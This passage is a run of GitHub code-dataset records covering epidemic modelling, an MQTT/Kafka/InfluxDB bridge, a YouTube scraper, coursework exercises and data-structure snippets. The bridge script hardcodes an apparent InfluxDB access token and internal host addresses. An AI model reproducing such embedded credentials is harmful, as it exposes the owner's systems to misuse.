original_degree_distrb, intervention_gen, intervention_T, initial_T, allPsi, g0, M_1, M_0, pre_vax_correction):\n for g in range(1, num_gens):\n if pre_vax_correction:\n if g < intervention_gen:\n # Re-compute T_g based on beta, gamma, g, v, and g_int\n beta_1 = .5 # TODO is it ok that this is arbitrary? Ans: Yes.\n gamma_1 = (beta_1 - beta_1 * initial_T) / initial_T\n q_1 = z1_of(g1_of(original_degree_distrb))\n beta_2 = .5\n gamma_2 = (beta_2 - beta_2 * intervention_T) / intervention_T\n\n T_g_i = T_pre_vax_fancy_2(beta_1=beta_1, beta_2=beta_2, gamma_1=gamma_1, gamma_2=gamma_2, q_1=q_1, gen_i=intervention_gen-g,\n v=1) #should v be 1 or 0?\n # Use new T_g to compute: new secondary degree distributions with T G(x;T):\n g1_T, g0_T = gen_functions_with_transmissibility(original_degree_distrb, T_g_i)\n # new T_g)\n # Re-compute M0 and M1 from new g1, g0\n M_0_g, M_1_g = constructMatrixM(g0_T, g1_T)\n M = M_1_g\n if g == 1:\n M = M_0_g\n else:\n if g < intervention_gen:\n M = M_1\n if g == 1:\n M = M_0\n print('working on gen ' + str(g))\n if g == intervention_gen:\n new_T = intervention_T\n new_g1, new_g0 = gen_functions_with_transmissibility(original_degree_distrb, new_T)\n new_M = constructMatrixM(g0, new_g1)\n M_1 = new_M[1]\n M = M_1\n if g == 1:\n M = M_0\n for s in range(max_s):\n for m in range(max_m):\n allPsi[g][s][m] = computeLittlePsi(s, m, allPsi[g - 1], M)\n psi_g = allPsi[g]\n psi_g = psi_g / np.sum(psi_g)\n allPsi[g] = psi_g\n return allPsi\n\n\ndef random_rollout_intervention(num_gens, max_s, max_m, original_degree_distrb, initial_T, allPsi, g0, M_1, M_0,\n rollout_dict, pre_vax_correction):\n intervention_gen_keys = list(rollout_dict.keys())\n inter_list = [0]\n inter_list.extend(intervention_gen_keys)\n beta = 0.8\n gamma = (beta - beta*initial_T) / initial_T\n q_1 = z1_of(g1_of(original_degree_distrb))\n v_rollout_cumu = [0]\n v_rollout_cumu.extend(np.cumsum(list(rollout_dict.values())))\n vacc_vector = np.zeros(num_gens)\n for i in 
range(num_gens):\n if i in inter_list and i!=0:\n vacc_vector[i] = rollout_dict[i]+vacc_vector[i-1]\n else:\n vacc_vector[i] = vacc_vector[i-1]\n\n for g in range(1, num_gens):\n # change num_gens to a big big number in computation and then see what the plot looks like\n T_g = manatee.t_of_g(betas=np.full(num_gens, beta), gammas=np.full(num_gens, gamma), qs=np.full(num_gens, q_1),\n vaccs=vacc_vector, g=g)\n print(g, T_g) # this makes sense\n g1_T, g0_T = gen_functions_with_transmissibility(original_degree_distrb, T_g) # changing it to modify the new G1 with the new Tg?\n M_0_g, M_1_g = constructMatrixM(g0_T, g1_T) # this now might be wiping away the changes made with the random vax dist\n M = M_1_g\n\n if g == 1:\n M = M_0\n for s in range(max_s):\n for m in range(max_m):\n allPsi[g][s][m] = computeLittlePsi(s, m, allPsi[g - 1], M)\n psi_g = allPsi[g]\n psi_g = psi_g / np.sum(psi_g) # normalize\n allPsi[g] = psi_g\n\n return allPsi\n\ndef modify_g0(G0, k_crit, replacement):\n G0_x = np.zeros((len(G0)))\n for k in range(0, k_crit):\n G0_x[k] = G0[k]\n G0_x[k_crit] = replacement\n if np.sum(G0_x) > 0:\n G0_x = G0_x/np.sum(G0_x)\n return G0_x\n\n\n\ndef targeted_rollout_intervention(num_gens, max_s, max_m, original_degree_distrb,\n initial_T, allPsi, g0, M_1, M_0, rollout_dict,\n pre_vax_correction):\n # First, need to create and find H, q and T for each generation g in the rollout:\n intervention_gen_keys = list(rollout_dict.keys())\n inter_list = [0]\n inter_list.extend(intervention_gen_keys)\n v_rollout_cumu = [0]\n v_rollout_cumu.extend(np.cumsum(list(rollout_dict.values())))\n vacc_vector = np.zeros(num_gens)\n for i in range(num_gens):\n if i in inter_list and i!=0:\n vacc_vector[i] = rollout_dict[i]+vacc_vector[i-1]\n else:\n vacc_vector[i] = vacc_vector[i-1]\n beta = 0.8 # arbitrary, via choice of initial_T\n gamma = (beta - beta*initial_T) / initial_T\n maxk = len(original_degree_distrb)\n g1_orig = g1_of(original_degree_distrb)\n origin_q = 
np.sum([k*g1_orig[k] for k in range(len(g1_orig))])\n dynamic_q = np.zeros((num_gens))\n first_gen_inter = intervention_gen_keys[0]\n dynamic_q[:first_gen_inter] = origin_q\n dynamic_H = np.zeros((num_gens))\n store_Ggs = np.zeros((maxk, maxk))\n store_G0s = np.zeros((maxk, maxk))\n store_Ggs[:first_gen_inter] = g1_orig\n store_G0s[:first_gen_inter] = original_degree_distrb\n delta_g_k = np.zeros((num_gens,maxk))\n\n ##### finding the q's and H's for each intervention:\n for gen, V in rollout_dict.items():\n print(vacc_vector[gen])\n crit_value, replace_prob, delta_g_k = critical_degree_calc(vacc_vector[gen], original_degree_distrb, delta_g_k, gen) # check if original makes sense\n print(crit_value)\n #H = np.sum([(k) * original_degree_distrb[k] for k in range(crit_value, len(original_degree_distrb))])\\\n # /np.sum([(k) * original_degree_distrb[k] for k in range(0, len(original_degree_distrb))])\n H_g = np.sum([(k+1) * delta_g_k[gen][k] * original_degree_distrb[k+1] for k in range(0, len(original_degree_distrb)-1)]) /np.sum([(k+1) * original_degree_distrb[k+1] for k in range(0, len(original_degree_distrb)-1)])\n print(f'H:{H_g}')\n mod_G0_H = modify_g0(original_degree_distrb, crit_value, replace_prob)\n print(mod_G0_H)\n mod_Gg_H = g_g_of(mod_G0_H, delta_g_k, gen)\n store_Ggs[gen:] = mod_Gg_H\n store_G0s[gen:] = mod_G0_H\n q_g = (1-H_g)* np.sum(mod_Gg_H) #changed to the sum since the derivations are different for normalizing\n if np.isnan(q_g):\n q_g = 0\n print(q_g)\n dynamic_q[gen:] = q_g\n dynamic_H[gen:] = H_g\n\n ######\n\n for g in range(1, num_gens):\n T_g = manatee.t_of_g(betas=np.full(num_gens, beta), gammas=np.full(num_gens, gamma), qs=dynamic_q,\n vaccs=dynamic_H, g=g)\n print(g, T_g)\n g0_x = store_G0s[g]\n g1_T, g0_T = gen_functions_with_transmissibility(g0_x, T_g)\n M_0_g, M_1_g = constructMatrixM(g0_T, g1_T)\n M = M_1_g\n\n if g == 1:\n M = M_0\n for s in range(max_s):\n for m in range(max_m):\n allPsi[g][s][m] = computeLittlePsi(s, m, allPsi[g - 
1], M)\n psi_g = allPsi[g]\n psi_g = psi_g / np.sum(psi_g)\n allPsi[g] = psi_g\n\n return allPsi\n\ndef T_pre_vax(beta_1, beta_2, gamma_1, gamma_2, q_1, gen_i, v):\n T_gen_i = beta_1 / (beta_1 + gamma_1 + ((q_1*beta_1) / gen_i)) \\\n + (((q_1*beta_1) / gen_i) / (beta_1 + gamma_1 + ((q_1*beta_1) / gen_i))\n * (beta_2/ (beta_2+gamma_2)) * (1-v))\n return T_gen_i\n\ndef T_pre_vax_fancy_2(beta_1, beta_2, gamma_1, gamma_2, q_1, gen_i, v):\n T_gen_i = beta_1 / (beta_1 + gamma_1 + ((q_1*beta_1) / (gen_i - .5))) \\\n + (((q_1*beta_1) / (gen_i - .5)) / (beta_1 + gamma_1 + ((q_1*beta_1) / (gen_i-0.5)))\n * (beta_2/ (beta_2+gamma_2)) * (1-v))\n return T_gen_i\n\ndef T_pre_vax_rollout(beta_1, beta_2, gamma_1, gamma_2, q_1, current_g, rollout_dict):\n T_modified = 0\n vax_prop_cum = 0\n for g in rollout_dict.keys():\n vax_prop_cum += rollout_dict[g]\n i_w = g - current_g\n if (T_modified == 0) and (g > current_g): #i.e. first term has not been added yet, and found next soonest intervention, then add 1st term:\n T_modified += beta_1 / (beta_1+gamma_1 + (q_1*beta_1/i_w))\n if g > current_g:\n T_modified += ((beta_1 * (1-vax_prop_cum)) / (beta_1 + gamma_1 + (q_1*beta_1/(i_w)))) * ((q_1*beta_1/i_w)/(beta_1+gamma_1+(q_1*beta_1/i_w)))\n return T_modified\n\n\ndef T_pre_vax_fancy(beta_1, beta_2, gamma_1, gamma_2, q_1, gen_i, v):\n term_1 = -math.e ** (-1 * gamma_1 * gen_i /(q_1 * beta_1)) + ((gamma_1/(beta_1+gamma_1))*math.e**(-(beta_1+gamma_1)*gen_i/(q_1*beta_1))) + (beta_1/(beta_1+gamma_1))\n term_2 = math.e ** (-gamma_2*gen_i/(q_1*beta_1)) - ((gamma_2/(gamma_2+beta_2)) * math.e**(-(beta_2+gamma_2)*gen_i/(q_1*beta_1)))\n T_gen_i = term_1 + (1-v) * term_2\n return T_gen_i\n\n\n\n# Convolution code below:\n# Used in methods generating the phase space pgf's\n# The phase space formalism needs\n# 1) Need the G_{g-1} formalism (This includes the double sum formula) **DONE\n# 2) Need to put together the matrix that Andrea is drawing,\n# this matrix will have rows of PGFs, each row is a 
exponentiated G_{g-1}\n# 3) Convolve the rows of this matrix to get one value associated with [G_{g-1}]^m'\n# 4) The value from the convolution will then lead to the Psi matrix\n\n# This is the convolution code\n\n\ndef find_pairs(m, len_dist_1, len_dist_2):\n ### must have all three args nat num valued\n ### must be that m <= len_dist_1 + len_dist_2\n pairs = []\n if (m <= len_dist_1 and m <= len_dist_2):\n for i in np.arange(0, m + 1, 1):\n pairs.append([i, m - i])\n elif (m <= len_dist_1 and m > len_dist_2):\n for i in np.arange(m - len_dist_2, m + 1, 1):\n pairs.append([i, m - i])\n elif (m > len_dist_1 and m <= len_dist_2):\n for i in np.arange(0, len_dist_1 + 1, 1):\n pairs.append([i, m - i])\n else:\n for i in np.arange(m - len_dist_2, len_dist_1 + 1, 1):\n pairs.append([i, m - i])\n return pairs\n\n\ndef convolve_dists(X, Y, static_length=None):\n ### X and Y should be vectors of probabilities (For our problem we need to incorporate the G0 and G1 probabilities in here.)\n ### each giving a distribution on a finite subset of the naturals\n if static_length is None:\n len_X = len(X)\n len_Y = len(Y)\n elif static_length is not None:\n len_X = static_length\n len_Y = static_length\n new_dist_len = len_X + len_Y - 1 # Don't think it has to be this long\n new_dist_len = len_X\n new_dist = np.zeros(new_dist_len)\n for m in np.arange(new_dist_len):\n new_prob = 0\n pairs = find_pairs(m, len_X - 1, len_Y - 1)\n for l_pair in pairs:\n new_prob = new_prob + X[l_pair[0]] * Y[l_pair[1]]\n new_dist[m] = new_prob\n return new_dist\n\ndef convolve_with_ifft(firstdist, seconddist):\n result_length = len(firstdist)\n\n # Copy each array into a 2d array of the appropriate shape.\n rows = np.zeros((2, result_length))\n for i, array in enumerate([firstdist, seconddist]):\n rows[i, :len(array)] = array\n\n # Transform, take the product, and do the inverse transform\n # to get the convolution.\n fft_of_rows = np.fft.fft(rows)\n fft_of_convolution = fft_of_rows.prod(axis=0)\n 
convolution = np.fft.ifft(fft_of_convolution)\n\n # Assuming real inputs, the imaginary part of the output can\n # be ignored.\n return convolution.real\n\n\ndef generating_function_metrics(gen_func_g0, gen_func_g1):\n # Placeholder function for computing outbreak size and other metrics on generating functions\n G1_func = gen_func_g1\n #\n G1_func[1] = G1_func[1] - 1\n #\n fun = np.poly1d(np.flip(gen_func_g1))\n roots = np.roots(fun)\n u = roots[(roots > 0) & (roots < 1)]\n\n # Outbreak size, What is going on here with the imaginary numbers\n if len(u) == 0:\n S = 1\n else:\n S = 1 - np.polyval(np.flip(gen_func_g0), u[1])\n print(S)\n","repo_name":"andrea-allen/pgf-networks","sub_path":"src/pgf_formalism.py","file_name":"pgf_formalism.py","file_ext":"py","file_size_in_byte":24911,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"33055385378","text":"import paho.mqtt.client as mqtt\nfrom KafkaUtils import *\nimport time\nimport time\nimport pandas as pd\nimport json\nimport paho.mqtt.client as mqtt\nfrom datetime import datetime\nfrom typing import NamedTuple\nimport time\nfrom influxdb_client import InfluxDBClient, Point, WritePrecision\nfrom influxdb_client.client.write_api import SYNCHRONOUS\n\n\nTOKEN = \"Fdh-kOfYFmROa9moZQeprDTKfP20WRIk8ZKbrYeyTVkc_DViQyOm0fRW-hBoY6nN3Q83D7BlCiW30AlYivL6KA==\"\nORG = \"UIUC\"\nBUCKET = \"MSAdata\"\nHOST=\"localhost\"\nMQTT_PORT=1883\nINFLUXDB_CLIENT = InfluxDBClient(url=\"http://localhost:8086\", token=TOKEN)\nwrite_api = INFLUXDB_CLIENT.write_api(write_options=SYNCHRONOUS)\nmqtt_broker='192.168.250.51' # or 192.168.250.51\nmqtt_client=mqtt.Client('MQTTBridge')\nmqtt_client.connect(mqtt_broker)\nMQTT_TOPIC = [(f\"dvpg/msa/tower/1/height/1000/sonic\", 0), (f\"dvpg/msa/tower/2/height/1000/sonic\", 0),\n (f\"dvpg/msa/tower/4/height/1000/sonic\", 0), (f\"dvpg/msa/tower/6/height/1000/sonic\", 0),\n (f\"dvpg/msa/tower/7/height/1000/sonic\", 0), 
(f\"dvpg/msa/tower/8/height/1000/sonic\", 0),\n (f\"dvpg/msa/tower/9/height/1000/sonic\", 0), (f\"dvpg/msa/tower/10/height/1000/sonic\", 0),\n (f\"dvpg/msa/tower/11/height/1000/sonic\", 0)]\n\n\n\n# Insert Logic To Check which Kafka Broker is up and then send the data to it\nkafka_broker=\"192.168.32.151\" # IP address\nkafka_port=\"9092\"\nkafkaInstance = KafkaUtils(broker = kafka_broker, port = kafka_port)\nkafka_topic=\"msaDataTower1Sonic\" ## Where Kafka wants to publish\n#kafkaInstance.createTopic(kafka_topic)\n\n\n\nclass SonicSensorData(NamedTuple):\n timestamp: str\n latitude: str\n longitude: str\n Altitude: float\n Tower: str\n sensorType: str\n measurement:str\n measurement_value_1: float\n measurement_value_2: float\n measurement_value_3: float\n measurement_value_4: float\n measurement_value_5: float\n\ndef parse_mqtt_message(payload):\n #print(\"Data payload is\", str(payload))\n res= json.loads(payload)\n time_stamp=res['time']\n\n location=res[\"location\"]\n latitude=location['lat']\n longitude=location['lon']\n altitude=location['alt']['value']\n tower=res['tower']\n sensorType=res['sensorType']\n reading=res['reading']\n if sensorType=='soil':\n measurement='12FebSonicKafka' ## Corresponds to Table Name\n measurement_value1=reading[0]['value']\n measurement_value2=reading[1]['value']\n measurement_value3=reading[2]['value']\n measurement_value4=reading[3]['value']\n measurement_value5=reading[4]['value']\n return SonicSensorData(time_stamp, latitude, longitude, altitude, tower, sensorType,measurement,measurement_value1,measurement_value2,measurement_value3,measurement_value4,measurement_value5)\n\n\ndef send_sensor_data_to_influx(sensor_data):\n if sensor_data.sensorType=='soil':\n json_body = [\n {\n 'measurement': sensor_data.measurement,\n 'tags': {\n 'latitude': sensor_data.latitude,\n 'longitude': sensor_data.longitude,\n 'Time_stamp': sensor_data.timestamp,\n 'tower': sensor_data.Tower,\n 'altitude': sensor_data.Altitude,\n 'sensorType': 
sensor_data.sensorType\n\n },\n 'fields': {\n 'measurement_value1': sensor_data.measurement_value_1,\n 'measurement_value2': sensor_data.measurement_value_2,\n 'measurement_value3': sensor_data.measurement_value_3,\n 'measurement_value4': sensor_data.measurement_value_4,\n 'measurement_value5': sensor_data.measurement_value_5\n\n }\n }\n ]\n write_api.write(BUCKET, ORG, json_body)\n #print(\"Data uploaded to InfluxDB\")\ndef on_message(client,userdata,message):\n\n msg_payload=str(message.payload)\n #print(\"Received MQTT message\", msg_payload)\n #data_to_send=message.payload.decode(\"utf-8\")\n\n\n kafkaInstance.sendData(topic_name=kafka_topic, data=message.payload)\n #print(\"Kafka Published: \", data_to_send)\n insertnflux(message.payload)\n\n\nKafka_running = True\nMQTT_running = False\n\ndef insertnflux(mqtt_data):\n global Kafka_running, MQTT_running\n #print(\"data is\", mqtt_data)\n print('Kafka_running:', Kafka_running, \" MQTT_running:\", MQTT_running)\n\n kafka_data = None\n\n if Kafka_running:\n kafka_data = kafkaInstance.receiveData(topic_name=kafka_topic)\n #print(kafka_data)\n\n if kafka_data:\n try:\n parsed_sensor_data = parse_mqtt_message(kafka_data.decode(\"utf-8\"))\n send_sensor_data_to_influx(parsed_sensor_data)\n except:\n print('exception in kafka')\n else:\n print(\"Kafka is None\")\n\n if MQTT_running and not Kafka_running:\n try:\n parsed_sensor_data = parse_mqtt_message(mqtt_data.decode(\"utf-8\"))\n send_sensor_data_to_influx(parsed_sensor_data)\n except:\n print('exception in mqtt parsing')\n\n# Python thread to read variables\nimport _thread\nimport time\nimport random\ndef update_global_state():\n global Kafka_running, MQTT_running\n i=0\n while i<20:\n # update the global variablee\n print('updating global varsiable:', i)\n Kafka_running = random.randint(0,1)\n MQTT_running = random.randint(0, 1)\n\n time.sleep(2)\n i+=1\n\n\ndef insertinfluxState():\n global Kafka_running, MQTT_running\n\n while true:\n 
time.sleep(2)\n\n_thread.start_new_thread(update_global_state,())\n#_thread.start_new_thread(insertinfluxState,())\n\nmqtt_client.subscribe(MQTT_TOPIC)\nmqtt_client.on_message=on_message\nmqtt_client.loop_forever()\n\n","repo_name":"raginigupta6/IoBT","sub_path":"Integrated-Kafka-MQTT/Bridge.py","file_name":"Bridge.py","file_ext":"py","file_size_in_byte":5837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"37866625406","text":"class SinhVien:\n def __init__(self,id,name,lop):\n self.id=id\n self.name=name\n self.lop=lop\n self.dcc=10\n def setDcc(self,s):\n cnt=10\n for i in s:\n if i=='m':\n cnt-=1\n elif i=='v': cnt-=2\n if cnt<0: cnt=0\n self.dcc=cnt\n def printf(self):\n print(self.id+\" \"+self.name+\" \"+self.lop+\" \"+str(self.dcc),end=' ')\n if self.dcc==0:\n print('KDDK')\n print()\n\n\nn=int(input())\na=[]\nd={}\nfor _ in range(n):\n id=input()\n name=input()\n lop=input()\n sv=SinhVien(id,name,lop)\n d[sv.id]=sv\n a.append(sv)\nfor _ in range(n):\n id,status=input().split()\n d[id].setDcc(status)\nfor i in a:\n i.printf()\n\n'''\n3\nB19DCCN999\nLe Cong Minh\nD19CQAT02-B\nB19DCCN998\nTran Truong Giang\nD19CQAT02-B\nB19DCCN997\nNguyen Tuan Anh\nD19CQCN04-B\nB19DCCN998 xxxmxmmvmx\nB19DCCN997 xmxmxxxvxx\nB19DCCN999 xvxmxmmvvm\n'''","repo_name":"Nauh24/Python_PTIT","sub_path":"PY04012-TÍNH ĐIỂM CHUYÊN CẦN.py","file_name":"PY04012-TÍNH ĐIỂM CHUYÊN CẦN.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"74153090051","text":"\nimport sympy\n\ndef numberOfPrimeFactors(n):\n c=0\n for i in range(2,n):\n #print(sympy.isprime(i))\n if(sympy.isprime(i) and n%i==0):\n c=c+1\n return c\ndef isSpecialNumber(n,p):\n if(numberOfPrimeFactors(n)>=p):\n return True\n else:\n return False\nif __name__==\"__main__\":\n p=int(input())\n for _ in range(int(input())):\n if(isSpecialNumber(int(input()),p)):\n 
print(\"YES\")\n else:\n print(\"NO\")","repo_name":"sreevidyachintala/APSSDC-Python-Programming-june-2019","sub_path":"Packages/numerical.py","file_name":"numerical.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"2097410263","text":"from urllib.request import urlopen\nfrom bs4 import BeautifulSoup\nimport json\nimport re\nfrom selenium import webdriver\nfrom webdriver_manager.firefox import GeckoDriverManager\nimport time\n\nVERSION = '0.1.0'\n\nRESPONSE = {\n 'id': str,\n 'title': str,\n 'upload_date': str,\n 'duration': str,\n 'description': str,\n 'genre': str,\n\n 'uploader': {\n 'channel_id': str,\n },\n 'statistics': {\n 'views': str,\n 'likes': int,\n },\n #'comments': str\n}\n\n\n\ndef make_soup(url):\n '''\n Reads the contents at the given URL and returns a Python object based on\n the structure of the contents (HTML).\n '''\n html = urlopen(url).read()\n return BeautifulSoup(html, 'lxml')\n\n\ndef scrape_data(id):\n '''\n Scrapes data from the YouTube video's page whose ID is passed in the URL,\n and returns a JSON object as a response.\n '''\n youtube_video_url = 'https://www.youtube.com/watch?v=' + id\n soup = make_soup(youtube_video_url)\n soup_itemprop = soup.find(id='watch7-content')\n if len(soup_itemprop.contents) > 1:\n video = RESPONSE\n uploader = video['uploader']\n statistics = video['statistics']\n video['id'] = id\n # get data from tags having `itemprop` attribute\n for tag in soup_itemprop.find_all(itemprop=True, recursive=False):\n key = tag['itemprop']\n if key == 'name':\n # get video's title\n video['title'] = tag['content']\n elif key == 'duration':\n # get video's duration\n video['duration'] = tag['content']\n elif key == 'datePublished':\n # get video's upload date\n video['upload_date'] = tag['content']\n elif key == 'genre':\n # get video's genre (category)\n video['genre'] = tag['content']\n elif key == 'thumbnailUrl':\n # 
get video thumbnail URL\n video['thumbnail_url'] = tag['href']\n elif key == 'interactionCount':\n # get video's views\n statistics['views'] = int(tag['content'])\n elif key == 'channelId':\n # get uploader's channel ID\n uploader['channel_id'] = tag['content']\n elif key == 'description':\n video['description'] = tag['content']\n elif key == 'playerType':\n video['playerType'] = tag['content']\n\n data = re.search(r\"var ytInitialData = ({.*?});\", soup.prettify()).group(1)\n data_json = json.loads(data)\n videoPrimaryInfoRenderer = data_json['contents']['twoColumnWatchNextResults']['results']['results']['contents'][0]['videoPrimaryInfoRenderer']\n likes=videoPrimaryInfoRenderer[\"videoActions\"]['menuRenderer'][\"topLevelButtons\"][0][\"segmentedLikeDislikeButtonRenderer\"][\"likeButton\"][\"toggleButtonRenderer\"]['defaultText'][\"simpleText\"]\n video['statistics']['likes'] = likes\n #video['comments']=ScrapComment(youtube_video_url)\n return RESPONSE\n\n return ({\n 'error': 'Video with the ID {} does not exist'.format(id)\n })\n\ndef ScrapComment(url):\n \"\"\" Scrapes comments from the YouTube video's page whose ID is passed in the URL,\n and returns a List as a response.\n \"\"\"\n option = webdriver.FirefoxOptions()\n option.add_argument(\"--headless\")\n driver = webdriver.Firefox(executable_path=GeckoDriverManager().install(), options=option)\n driver.get(url)\n prev_h = 0\n while True:\n height = driver.execute_script(\"\"\"\n function getActualHeight() {\n return Math.max(\n Math.max(document.body.scrollHeight, document.documentElement.scrollHeight),\n Math.max(document.body.offsetHeight, document.documentElement.offsetHeight),\n Math.max(document.body.clientHeight, document.documentElement.clientHeight)\n );\n }\n return getActualHeight();\n \"\"\")\n driver.execute_script(f\"window.scrollTo({prev_h},{prev_h + 200})\")\n # fix the time sleep value according to your network connection\n time.sleep(1)\n prev_h +=200 \n if prev_h >= height:\n break\n 
soup = BeautifulSoup(driver.page_source, 'html.parser')\n driver.quit()\n comment_div = soup.select(\"#content #content-text\")\n comment_list = [x.text for x in comment_div]\n return(comment_list)\n","repo_name":"yosxos/Youtube-Scraper","sub_path":"scrapper_youtube.py","file_name":"scrapper_youtube.py","file_ext":"py","file_size_in_byte":4508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"9577428703","text":"\nfrom odoo import api, fields, models\n\n\nclass DoneTimer(models.TransientModel):\n _name = \"done.timer\"\n\n time = fields.Float(string=\"Time\")\n explication = fields.Char(string=\"Explication\")\n\n def update_lines(self):\n current_task = self.env['project.task'].browse(self._context.get('task_id'))\n self.env['account.analytic.line'].sudo().create({\n 'date': fields.Datetime.now(),\n 'employee_id': self.env.user.employee_id.id,\n 'name': self.explication,\n 'unit_amount': self.time,\n 'project_id': current_task.project_id.id,\n 'task_id': current_task.id,\n 'account_id': current_task.project_id.analytic_account_id.id\n })\n current_task.update({\n 'duration': 0\n })\n return True\n","repo_name":"BriceCG/timer","sub_path":"wizards/wizard_done_timer.py","file_name":"wizard_done_timer.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"19258474911","text":"class Node:\n def __init__(self, value = None) -> None:\n self.value = value\n self.next = None\n self.prev = None\n\nclass DoublyLinkedList:\n def __init__(self) -> None:\n self.head = None\n self.tail = None\n\n def __iter__(self):\n node = self.head\n while node:\n yield node\n node = node.next\n\n # Create Doubly Linked List\n def createDLL(self, nodeValue): # Time Complexity -> O(1)\n node = Node(nodeValue)\n node.prev = None\n node.next = None\n self.head = node\n self.tail = node\n return \"The DLL is created successfully!\"\n\n # 
Insert a node (Start, Middle, End)\n def insertNode(self, nodeValue, location): # Time Complexity -> O(n)\n if self.head is None:\n print(\"The head referance is empty\")\n newNode = Node(nodeValue)\n # Insert at the start\n if location == 0:\n newNode.prev = None\n newNode.next = self.head\n self.head.prev = newNode\n self.head = newNode\n # Insert at the end\n elif location == 1:\n newNode.next = None\n newNode.prev = self.tail\n self.tail.next = newNode\n self.tail = newNode\n # Insert at any position\n else:\n tempNode = self.head\n index = 0\n while index < location - 1:\n tempNode = tempNode.next\n index += 1\n newNode.next = tempNode.next\n newNode.prev = tempNode\n newNode.next.prev = newNode\n tempNode.next = newNode\n\n # Travarse the Linked List\n def travarseLL(self): # Time Complexity -> O(n)\n if self.head is None:\n print(\"There is no elements in the list\")\n tempNode = self.head\n while tempNode:\n print(tempNode.value)\n tempNode = tempNode.next\n\n # Travarsal in reverse order\n def reverseTraverseLL(self): # Time Complexity -> O(n)\n if self.head is None:\n print(\"There is no element in the Linked List\")\n tempNode = self.tail\n while tempNode:\n print(tempNode.value)\n tempNode = tempNode.prev\n\n # Search in Doubly Linked List\n def searchLL(self, nodeValue): # Time Complexity -> O(n)\n if self.head is None:\n print(\"There is no element in the Linked List\")\n tempNode = self.head\n while tempNode:\n if tempNode.value == nodeValue:\n return tempNode.value\n tempNode = tempNode.next\n return \"The node doesn't exists in the list\"\n\n # Delete Node from DLL (Start, End, Middle)\n def deleteNode(self, location): # Time Complexity -> O(n)\n if self.head is None:\n print(\"There is no element in DLL\")\n # Delete from the start\n if location == 0:\n # When only 1 node in DLL\n if self.head == self.tail:\n self.head = None\n self.tail = None\n # More than 1 Node\n else:\n self.head = self.head.next\n self.head.prev = None\n # Delete from the 
end\n elif location == 1:\n # Only 1 node\n if self.head == self.tail:\n self.head = None\n self.tail = None\n # More than 1 node\n else:\n self.tail = self.tail.prev\n self.tail.next = None\n # Delete from any given location\n else:\n currNode = self.head\n index = 0\n while index < location - 1:\n currNode = currNode.next\n index += 1\n currNode.next = currNode.next.next\n currNode.next.prev = currNode\n print(\"The node has been successfully deleted\")\n\n # Delete the whole DLL\n def deleteList(self): # Time Complexity -> O(n)\n if self.head is None:\n print(\"There is no node in DLL\")\n tempNode = self.head\n while tempNode:\n tempNode.prev = None\n tempNode = tempNode.next\n self.head = None\n self.tail = None\n print(\"The DLL has been successfully deleted\")\n\n\nif __name__ == \"__main__\":\n ll = DoublyLinkedList()\n\n print(ll.createDLL(5))\n ll.insertNode(0,0)\n ll.insertNode(2,1)\n ll.insertNode(3,2)\n\n # ll.travarseLL()\n # ll.reverseTraverseLL()\n\n print([node.value for node in ll])\n\n # ll.deleteNode(-1)\n ll.deleteList()\n # print(ll.searchLL(7))\n\n print([node.value for node in ll])\n\n","repo_name":"Swaniket/Data-Structures-and-Algorithms-in-Python","sub_path":"04. 
Linked List/04_doublyLL.py","file_name":"04_doublyLL.py","file_ext":"py","file_size_in_byte":4575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"37627963050","text":"from __future__ import annotations\nfrom typing import Optional\nfrom ctci.utils.linked_lists import Node\n\n\ndef remove_dups(head: Node) -> Optional[Node]:\n \"\"\"Removes any duplicates from a linked list\n\n Args:\n head (Node): the beginning of a linked list\n\n Returns:\n Optional[Node]: returns the head of the linked list with duplicates removed\n \"\"\"\n\n # Set to see which values we have seen\n seen = set()\n\n # If the head is none, return none\n if head is None:\n return None\n\n # Loop through the elements and delete the node if we come across a value that has\n # already been seen\n cur_node: Optional[Node] = head\n prev: Optional[Node] = None\n while cur_node is not None:\n\n if cur_node.value in seen and prev is not None:\n prev.next = cur_node.next\n\n else:\n seen.add(cur_node.value)\n prev = cur_node\n\n cur_node = cur_node.next\n\n return head\n\n\ndef remove_dups_no_buffer(head: Node) -> Optional[Node]:\n \"\"\"Removes any duplicates from a linked list\n\n Args:\n head (Node): the beginning of a linked list\n\n Returns:\n Optional[Node]: returns the head of the linked list with duplicates removed\n \"\"\"\n\n # If the head is none, return none\n if head is None:\n return None\n\n # Implement two pointer approach\n first_pointer: Optional[Node] = head\n while first_pointer is not None:\n\n # Second pointer to start right after current pointer\n second_pointer: Optional[Node] = first_pointer.next\n prev: Optional[Node] = first_pointer\n\n # Go through the items after the first pointer and compare them with the second\n # pointer\n while second_pointer is not None and prev is not None:\n if first_pointer.value == second_pointer.value:\n prev.next = second_pointer.next\n else:\n prev = second_pointer\n\n second_pointer = 
second_pointer.next\n\n first_pointer = first_pointer.next\n\n return head\n","repo_name":"samkasbawala/ctci","sub_path":"ctci/linked_list/remove_dups.py","file_name":"remove_dups.py","file_ext":"py","file_size_in_byte":2038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"22179685962","text":"'''\n\n设计一个支持以下两种操作的数据结构:\n\nvoid addWord(word)\nbool search(word)\nsearch(word) 可以搜索文字或正则表达式字符串,字符串只包含字母 . 或 a-z 。 . 可以表示任何一个字母。\n\n��例:\n\naddWord(\"bad\")\naddWord(\"dad\")\naddWord(\"mad\")\nsearch(\"pad\") -> false\nsearch(\"bad\") -> true\nsearch(\".ad\") -> true\nsearch(\"b..\") -> true\n说明:\n\n你可以假设所有单词都是由小写字母 a-z 组成的。\n'''\n# 自己的版本\nclass WordDictionary:\n\n def __init__(self):\n \"\"\"\n Initialize your data structure here.\n \"\"\"\n self.root = {}\n\n def addWord(self, word: str) -> None:\n \"\"\"\n Adds a word into the data structure.\n \"\"\"\n p = self.root\n for i in 